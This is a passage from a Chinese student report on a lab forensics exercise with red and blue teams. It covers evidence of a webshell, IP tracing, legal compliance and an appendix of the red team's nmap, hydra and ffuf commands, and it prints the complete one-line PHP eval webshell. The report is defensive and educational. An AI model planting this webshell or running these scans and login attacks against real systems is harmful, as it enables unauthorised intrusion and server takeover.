</h3><p>查看 <code>webshell.php</code> 的属性信息：创建时间为 2025 年 12 月 10 日 21:51:17，与红队执行 SQL 写入 Shell 的时间（21:05 左右）高度吻合，时间差源于系统文件创建延迟和防御软件拦截时间。结合文件内容和创建时间，可直接证明该文件为红队攻击过程中写入的恶意文件。
（文件属性截图）</p>
<p><img src="/%5c%5cimages%5c22.png"
	
	
	
	loading="lazy"
	
	
></p>
<h2 id="35-ip-溯源分析">3.5 IP 溯源分析
</h2><p>IP 溯源通过查询攻击方 IP 地址的相关信息，定位攻击源头，为追踪攻击者提供线索。本次实训中红队使用内网 IP，通过模拟公网 IP 溯源场景完成分析。</p>
<h3 id="351-公网-ip-获取">3.5.1 公网 IP 获取
</h3><p>红队将 Kali Linux 虚拟机网络模式改为 NAT 模式，通过终端执行 <code>curl ifconfig.me</code> 命令，获取公网 IP 地址为 <code>119.133.5.47</code>。</p>
<p><img src="/%5c%5cimages%5c23.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="352-威胁情报查询">3.5.2 威胁情报查询
</h3><p>蓝队访问微步在线威胁情报平台（https://x.threatbook.cn/），输入红队公网 IP <code>119.133.5.47</code> 进行查询，结果如下：</p>
<p><img src="/%5c%5cimages%5c24.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/%5c%5cimages%5c25.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/%5c%5cimages%5c26.png"
	
	
	
	loading="lazy"
	
	
></p>
<ol>
<li><strong>地理位置</strong>：中国广东省江门市，运营商为中国电信，用户类型为住宅用户；</li>
<li><strong>IP 特征</strong>：动态 IP，近期存在少量扫描行为，包括访问敏感文件、端口扫描等；</li>
<li><strong>关联信息</strong>：该 IP 所属 C 段（119.133.5.0/24）存在 22 个恶意 IP，历史攻击记录显示该 IP 曾用于传播木马和端口扫描；</li>
<li><strong>时间匹配</strong>：情报更新时间为 2025 年 12 月 10 日，与本次实训攻击时间一致。</li>
</ol>
<h3 id="353-溯源结论">3.5.3 溯源结论
</h3><p>结合 IP 查询结果和攻击行为特征，可确认 <code>119.133.5.47</code> 为红队攻击时使用的公网 IP，该 IP 所属区域、运营商信息及历史行为均与本次攻击特征吻合，为攻击源头定位提供了关键线索。</p>
<hr>
<h1 id="第-4-章结论">第 4 章　结论
</h1><h2 id="41-实训总结">4.1 实训总结
</h2><p>本次计算机取证技术实训基于红蓝攻防模式，成功完成了 Web 系统入侵取证的全流程实践。蓝队通过网络流量取证、系统日志分析、文件证据提取和 IP 溯源四大核心技术，构建了完整的证据链，全面还原了红队的攻击过程：红队首先通过 Nmap 端口扫描发现蓝队开放 80 和 21 端口，随后利用 Hydra 爆破 FTP 弱口令成功登录，通过 Ffuf 目录扫描找到 Dedecms 后台和 phpmyadmin 路径，最终通过 SQL 注入写入一句话木马，获取服务器控制权。</p>
<p>实训过程中，各取证技术相互印证：网络流量捕获了攻击的实时交互数据，系统日志记录了攻击的时间轨迹，文件证据提供了攻击的直接遗留物，IP 溯源定位了攻击的源头线索，形成了“行为捕获 - 轨迹验证 - 物证确认 - 源头定位”的完整取证闭环，达到了实训预期目标。</p>
<h2 id="42-问题与解决方案">4.2 问题与解决方案
</h2><p>实训过程中遇到的主要问题及解决方案如下：</p>
<ol>
<li><strong>虚拟机网络不通</strong>：初始配置时红蓝双方无法 ping 通，排查发现是防火墙拦截，关闭双方防火墙后问题解决；</li>
<li><strong>FTP 爆破失败</strong>：因 Windows Server 2019 默认关闭 FTP 匿名登录，通过 IIS 管理器开启匿名身份验证并配置授权规则后，爆破成功；</li>
<li><strong>PHP 文件无法解析</strong>：IIS 服务器未配置 PHP 处理程序，通过添加 FastCGI 模块映射并重启 IIS 服务，成功解析 .php 文件；</li>
<li><strong>SQL 写入 Shell 失败</strong>：路径格式错误和文件夹权限不足导致，修正 SQL 语句中的路径转义格式，并为目标文件夹添加 NETWORK SERVICE 写入权限后，成功生成恶意文件。</li>
</ol>
<h2 id="43-可行性分析">4.3 可行性分析
</h2><p>本次实训所采用的取证方案具备充分的技术可行性、环境可行性和操作可行性，具体分析如下：</p>
<h3 id="431-技术可行性">4.3.1 技术可行性
</h3><p>本次实训选用的取证技术均为网络安全领域成熟且广泛应用的主流技术：
网络流量取证依赖 Wireshark 工具，其具备强大的数据包捕获与过滤能力，可精准筛选攻击相关流量；
日志分析采用 Log Parser Lizard 工具，适配 IIS 日志、Windows 安全日志等多种格式，查询效率与分析准确性经过实践验证；
文件取证工具 Notepad++、WinHex 可满足恶意文件内容查看与属性分析需求；
IP 溯源借助微步在线等权威威胁情报平台，数据来源可靠、查询结果精准。
所有技术工具均具备完善的文档支持与社区资源，技术门槛符合实训场景要求，且各技术间可形成互补印证，确保取证流程的完整性与有效性。</p>
<h3 id="432-环境可行性">4.3.2 环境可行性
</h3><p>实训基于 VMware Workstation 搭建虚拟化环境，红蓝双方虚拟机分别采用 Windows Server 2019 和 Kali Linux 操作系统，均为攻防实训的标准配置，兼容性强。网络规划采用 172.3.0.0/16 私有网段，设置“仅主机模式”避免外部网络干扰，同时通过 ping 测试验证了网络互通性，为攻防交互与取证数据捕获提供了稳定的网络环境。Web 系统选用存在明确漏洞的 Dedecms 5.7.118 版本，FTP 服务与 XAMPP 环境的配置流程清晰，可复现真实攻击场景，确保取证过程有明确的攻击行为可追溯、有完整的证据可提取。</p>
<h3 id="433-操作可行性">4.3.3 操作可行性
</h3><p>实训团队分工明确，组长统筹协调，成员分别负责攻击实施、取证统筹、流量捕获与日志分析等核心环节，职责划分与技术能力匹配度高。实训步骤按“环境搭建 - 攻击实施 - 多维度取证 - 证据整合”逐步推进，每个环节均有明确的操作指南与验证标准，如网络连通性通过 ping 测试验证、攻击行为通过流量包确认、证据有效性通过时间戳与内容关联性佐证。针对实训中出现的网络不通、服务配置异常等问题，均能通过现有技术手段快速排查解决，未出现技术瓶颈或无法实现的操作环节，确保了整个取证流程的顺利推进。</p>
<h2 id="44-信息安全相关法律法规运用">4.4 信息安全相关法律法规运用
</h2><p>计算机取证工作的核心前提是“合法合规”，本次实训严格遵循我国信息安全领域相关法律法规要求，将法律合规性贯穿取证全流程，具体运用如下：</p>
<h3 id="441-核心法律法规依据">4.4.1 核心法律法规依据
</h3><ol>
<li><strong>《中华人民共和国网络安全法》</strong>：明确规定网络运营者应当按照规定留存相关网络日志不少于六个月，本次实训中蓝队全程留存 Windows 安全日志、IIS Web 日志及 Wireshark 流量文件，符合日志留存义务要求；同时该法禁止非法侵入他人网络、非法获取网络数据，红队模拟攻击仅在授权实训环境内进行，严格界定了操作边界，避免触碰法律红线。</li>
<li><strong>《中华人民共和国数据安全法》</strong>：要求数据处理活动应当保证数据的真实性、完整性、可用性。本次实训中所有取证数据（流量包、日志文件、恶意文件）均原始保存，未进行篡改或删减，通过文件属性、时间戳等信息确保数据可追溯，符合数据安全保护要求。</li>
<li><strong>《中华人民共和国个人信息保护法》</strong>：明确个人信息处理应当遵循合法、正当、必要原则。本次实训环境为纯模拟场景，未涉及任何真实个人信息，避免了个人信息泄露风险，符合个人信息保护的法律规定。</li>
<li><strong>《中华人民共和国刑事诉讼法》</strong>：电子证据需满足“真实性、合法性、关联性”三大要件。本次实训中，流量包捕获过程全程记录、日志提取流程规范、恶意文件原始保存，所有证据均能对应攻击行为的时间、主体、操作内容，形成完整的证据链，符合电子证据的法定要求。</li>
</ol>
<h3 id="442-实训中的合规性实践">4.4.2 实训中的合规性实践
</h3><ol>
<li><strong>取证权限合规</strong>：蓝队作为“授权防守方”，仅对实训指定的目标服务器（172.3.200.10）进行取证操作，未越权访问其他设备或网络资源，确保取证行为的合法性。</li>
<li><strong>证据收集合规</strong>：所有证据均通过合法工具与正当手段获取，未采用侵入式、破坏性技术，如流量捕获通过网卡监听而非篡改网络设备配置，日志提取通过系统自带工具而非破解权限，避免因取证手段非法导致证据无效。</li>
<li><strong>证据保全合规</strong>：对捕获的流量包（<code>Attack_traffic.pcap</code>）、日志文件、恶意文件（<code>webshell.php</code>）均进行原始备份与格式固定，同时记录证据获取的时间、地点、方式，形成证据保全清单，确保证据在后续分析与呈现过程中不被篡改，符合法律对电子证据保全的要求。</li>
</ol>
<h2 id="45-展望">4.5 展望
</h2><p>通过本次实训，深入掌握了计算机取证的核心技术和工具使用方法，深刻认识到攻防对抗中证据留存的重要性，同时强化了法律合规意识与方案设计能力。未来可从以下方面进一步提升：</p>
<ol>
<li><strong>技术拓展</strong>：引入蜜罐技术构建诱捕环境，增强攻击痕迹的捕获能力；探索内存取证、区块链存证等新兴技术，丰富取证手段；</li>
<li><strong>工具优化</strong>：学习使用 ELK Stack 等日志分析平台，提高大规模日志的处理效率；尝试自动化取证脚本开发，提升取证流程的标准化与高效性；</li>
<li><strong>合规深化</strong>：结合更多典型案例，深入研究电子证据在司法实践中的应用标准，强化法律法规与取证实操的结合度，提升合规取证的专业性。</li>
</ol>
<hr>
<h1 id="附录">附录
</h1><h2 id="红队攻击命令">红队攻击命令
</h2><ol>
<li>
<p>网络配置：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sudo nano /etc/network/interfaces   # 修改 IP
</span></span><span class="line"><span class="cl">sudo systemctl restart networking   # 重启网络
</span></span></code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>端口扫描：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">nmap -sV -p 1-1000 172.3.200.10
</span></span></code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>FTP 爆破：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">hydra -l anonymous -p anonymous ftp://172.3.200.10
</span></span></code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>目录扫描：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">ffuf -u &#34;http://172.3.200.10/dedecms/FUZZ&#34; -w /usr/share/wordlists/dirb/common.txt -fc 404
</span></span></code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>公网 IP 获取：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">curl ifconfig.me
</span></span></code></pre></td></tr></table>
</div>
</div></li>
</ol>
<h2 id="蓝队取证命令">蓝队取证命令
</h2><ol>
<li>
<p>网络连通性验证：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">ping 172.3.200.20
</span></span></code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>IIS 日志查询（Log Parser Lizard 中执行）：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">SELECT date, time, c-ip, cs-method, cs-uri-stem 
</span></span><span class="line"><span class="cl">FROM &#39;C:\xampp\apache\logs\access.log&#39; 
</span></span><span class="line"><span class="cl">WHERE c-ip = &#39;172.3.200.20&#39;
</span></span></code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>防火墙配置（Linux 示例）：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">iptables -F                # 清除规则
</span></span><span class="line"><span class="cl">iptables -P INPUT ACCEPT   # 设置默认策略
</span></span></code></pre></td></tr></table>
</div>
</div></li>
</ol>
<h2 id="附录-b-关键配置文件内容">附录 B 关键配置文件内容
</h2><h3 id="1-kali-linux-网络配置文件etcnetworkinterfaces">1. Kali Linux 网络配置文件（<code>/etc/network/interfaces</code>）
</h3><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">auto lo
</span></span><span class="line"><span class="cl">iface lo inet loopback
</span></span><span class="line"><span class="cl">auto eth0
</span></span><span class="line"><span class="cl">iface eth0 inet static
</span></span><span class="line"><span class="cl">    address 172.3.200.20
</span></span><span class="line"><span class="cl">    netmask 255.255.0.0
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/%5c%5cimages%5c27.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="2-一句话木马文件webshellphp">2. 一句话木马文件（<code>webshell.php</code>）
</h3><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;?php @eval($_POST[&#34;cmd&#34;]);?&gt;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/%5c%5cimages%5c28.png"
	
	
	
	loading="lazy"
	
	
></p>

</section>


    <footer class="article-footer">
    

    <section class="article-lastmod">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <span>
            最后更新于 Aug 07, 2026 16:08 &#43;0800
        </span>
    </section></footer>


    
        <link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/katex@0.16.9/dist/katex.min.css"integrity="sha384-n8MVd4RsNIU0tAv4ct0nTaAbDJwPJzDEaqSD1odI&#43;WdtXRGWt2kTvGFasHpSy3SV"crossorigin="anonymous"
            ><script 
                src="https://cdn.jsdelivr.net/npm/katex@0.16.9/dist/katex.min.js"integrity="sha384-XjKyOOlGwcjNTAIQHIpgOno0Hl1YQqzUOEleOLALmuqehneUG&#43;vnGctmUb0ZY0l8"crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/katex@0.16.9/dist/contrib/auto-render.min.js"integrity="sha384-&#43;VBxd3r6XgURycqtZ117nYw44OOcIax56Z4dCRWbxyPt0Koah1uHoK0o4&#43;/RRE05"crossorigin="anonymous"
                defer
                >
            </script><script>
    window.addEventListener("DOMContentLoaded", () => {
	const mainArticleElement = document.querySelector(".main-article");
        renderMathInElement(mainArticleElement, {
            delimiters: [
                { left: "$$", right: "$$", display: true },
                { left: "$", right: "$", display: false },
                { left: "\\(", right: "\\)", display: false },
                { left: "\\[", right: "\\]", display: true }
            ],
            ignoredClasses: ["gist"]
        });})
</script>

    
</article>

    

    

<aside class="related-content--wrapper">
    <h2 class="section-title">相关文章</h2>
    <div class="related-content">
        <div class="flex article-list--tile">
            
                
<article class="">
    <a href="/p/ncip%E6%A8%A1%E6%8B%9F%E9%A2%98%E5%BA%93900%E9%81%93/">
        
        

        <div class="article-details">
            <h2 class="article-title">NCIP模拟题库（900道）</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/%E7%BD%91%E5%B7%A5%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%82%B9/">
        
        

        <div class="article-details">
            <h2 class="article-title">网工基础知识点</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/cet4_eassay2025/">
        
        

        <div class="article-details">
            <h2 class="article-title">CET4_Eassay(2025)</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/cet4_%E6%A8%A1%E6%8B%9F/">
        
        

        <div class="article-details">
            <h2 class="article-title">CET4_模拟</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/cet4_202206/">
        
        

        <div class="article-details">
            <h2 class="article-title">CET4_202206</h2>
        </div>
    </a>
</article>

            
        </div>
    </div>
</aside>

     
    
        
    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2024 - 
        
        2026 梦幻星河
    </section>
    
    <section class="powerby">
        使用 <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> 构建 <br />
        主题 <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.30.0">Stack</a></b> 由 <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a> 设计
    </section>
</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.1e9a3bafd846ced4c345d084b355fb8c7bae75701c338f8a1f8a82c780137826.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>
<style>
    #backTopBtn {
        display: none;
        position: fixed;
        bottom: 30px;
        z-index: 99;
        cursor: pointer;
        width: 30px;
        height: 30px;
        background-image: url(https://charles-lin-cell.github.io/icons/backTop.svg);
    }
</style>

<script>
    

    function initScrollTop() {
        let rightSideBar = document.querySelector(".right-sidebar");
        if (!rightSideBar) {
            return;
        }
        
        let btn = document.createElement("div");
        btn.id = "backTopBtn";
        btn.onclick = backToTop
        rightSideBar.appendChild(btn)
        
        window.onscroll = function() {
            
            if (document.body.scrollTop > 20 || document.documentElement.scrollTop > 20) {
                btn.style.display = "block";
            } else {
                btn.style.display = "none";
            }
        };
    }

    

    function backToTop(){
        window.scrollTo({ top: 0, behavior: "smooth" })
    }

    initScrollTop();
</script>











<style>
    .highlight {
         
        max-height: 400px;
        overflow: hidden;
    }

    .code-show {
        max-height: none !important;
    }

    .code-more-box {
        width: 100%;
        padding-top: 78px;
        background-image: -webkit-gradient(linear, left top, left bottom, from(rgba(255, 255, 255, 0)), to(#fff));
        position: absolute;
        left: 0;
        right: 0;
        bottom: 0;
        z-index: 1;
    }

    .code-more-btn {
        display: block;
        margin: auto;
        width: 44px;
        height: 22px;
        background: #f0f0f5;
        border-top-left-radius: 8px;
        border-top-right-radius: 8px;
        padding-top: 6px;
        cursor: pointer;
    }

    .code-more-img {
        cursor: pointer !important;
        display: block;
        margin: auto;
        width: 22px;
        height: 16px;
    }
</style>

<script>
  function initCodeMoreBox() {
    let codeBlocks = document.querySelectorAll(".highlight");
    if (!codeBlocks) {
      return;
    }
    codeBlocks.forEach(codeBlock => {
      
      if (codeBlock.scrollHeight <= codeBlock.clientHeight) {
        return;
      }
      
      
      let codeMoreBox = document.createElement('div');
      codeMoreBox.classList.add('code-more-box');
      
      let codeMoreBtn = document.createElement('span');
      codeMoreBtn.classList.add('code-more-btn');
      codeMoreBtn.addEventListener('click', () => {
        codeBlock.classList.add('code-show');
        codeMoreBox.style.display = 'none';
        
        window.dispatchEvent(new Event('resize'))
      })
      
      let img = document.createElement('img');
      img.classList.add('code-more-img');
      img.src = "https://charles-lin-cell.github.io/icons/codeMore.svg"
      
      codeMoreBtn.appendChild(img);
      codeMoreBox.appendChild(codeMoreBtn);
      codeBlock.appendChild(codeMoreBox)
    })
  }
  
  initCodeMoreBox();
</script>







<style>
    #TableOfContents > ul, ol {
        ul, ol {
            display: none;
        }
        .open {
            display: block;
        }
    }
</style>

<script>
    function initTocHide() {
        
        let toc = document.querySelector(".widget--toc");
        if (!toc) {
            return;
        }
        
        window.addEventListener('scroll', function() {
            
            let openUl = document.querySelectorAll(".open");
            if (openUl.length > 0) {
              openUl.forEach((ul) => {
                ul.classList.remove("open")
              })
            }
            
            let currentLi = document.querySelector(".active-class");
            if (!currentLi) {
                return
            }
            
            if (currentLi.children.length > 1) {
                currentLi.children[1].classList.add("open")
            }
            
            let ul = currentLi.parentElement;
            do {
                ul.classList.add("open");
                ul = ul.parentElement.parentElement
            } while (ul !== undefined && (ul.localName === 'ul' || ul.localName === 'ol'))
        });
    }
    initTocHide()
</script>

    </body>
</html>
